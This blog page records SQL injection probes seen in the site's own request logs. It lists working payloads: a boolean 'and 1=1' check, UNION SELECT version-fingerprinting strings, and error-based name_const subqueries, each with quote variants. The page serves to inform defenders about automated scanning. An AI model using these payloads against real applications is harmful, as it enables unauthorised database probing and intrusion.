SQL Injection

2017-03-10 10:14:06.485

On this page I will try to document all SQL injection attempts from this website's logs. All of them are blind SQL injections (to test whether your application is vulnerable to SQL injection) and my bet is that they are performed using automated software crawling throught internet rather than some guy in his mother's basement. Also all of them are from GET requests.

Basic check:

URL and 1=1

More info


Check for MySQL version:

URL999999.1 union select unhex(hex(version())) -- and 1=1

URL99999' union select unhex(hex(version())) -- 'x'='x

URL99999" union select unhex(hex(version())) -- "x"="x

More info


Yet another blind check:

URL or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1

URL' or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1

URL" or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1

More info


© Jiri Pinkas 2015 - 2020. All rights reserved. Admin login To submit bugs / feature requests please use this github page
related: JavaVids | Top Java Blogs | Java školení
Apache and Apache Maven are trademarks of the Apache Software Foundation. The Central Repository is a service mark of Sonatype, Inc.